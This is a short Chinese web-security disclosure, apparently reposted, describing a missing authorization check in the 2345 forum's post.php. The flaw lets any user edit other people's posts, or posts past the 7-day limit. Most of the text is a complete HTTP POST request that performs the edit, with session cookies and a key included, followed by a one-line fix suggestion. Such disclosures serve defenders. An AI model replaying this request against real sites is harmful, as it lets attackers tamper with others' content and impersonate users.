2345论坛过滤不严可任意编辑他人帖子

2345论坛过滤不严可任意编辑他人帖子 - 网站安全

来源：自学PHP网时间：2015-04-15 15:00 作者：阅读:次

[导读] 接口缺少过滤可以任意编辑他人帖子任意编辑超过7天限制的帖子问题接口: post phpPOST post php HTTP 1 1Host: wangpai 2345 cnProxy-Connection: keep-aliveContent-Length: 193User-Agent: Mozilla 5 0...

接口缺少过滤可以任意编辑他人帖子/任意编辑超过7天限制的帖子

问题接口:/post.php

POST /post.php HTTP/1.1
Host: wangpai.2345.cn
Proxy-Connection: keep-alive
Content-Length: 193
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Origin: chrome-extension://kajfghlhfkcocafkcjlajldicbikpgnp
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: user_info=NjQ0ZXpGdEJwMk5rRTNVMi9PTnNWZXpzTUoxbXlxaHBnNk9FK2dKY21VYmlhajdvY1Ara01xU2h3RFlxU09Z; I=i%3D332053%26u%3D958194%26n%3D654188164%26t%3D1407067341.76247900%26s%3Db4bf332239352cff252f64303859bb0a%26v%3D1.0; PHPSESSID=nt2315hhj7a41583m0e8md0ui1

title=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&isBright=1&content=%b2%e2%ca%d4%b1%e0%bc%ad%cb%fb%c8%cb%cc%fb%d7%d3&id=2491986&postid=2491986&act=edit_post&fid=13&page=&key=d274ec87aacec1c8728692cf578c5c29

以上代码可以编辑如下帖子

http://wangpai.2345.cn/thread.php?fid=13&pid=2491986

如果用这个漏洞编辑置顶帖子的话,危害挺大的吧

修复方案：

过滤吧- -

我是这样以系统管理员权限进入天生创想任意用

走秀网利用XSS+STRUCT2任意执行命令 - 网站安全 -

子栏目

2345论坛过滤不严可任意编辑他人帖子 - 网站安全

修复方案：

最新评论

添加评论

更多文章推荐

添加评论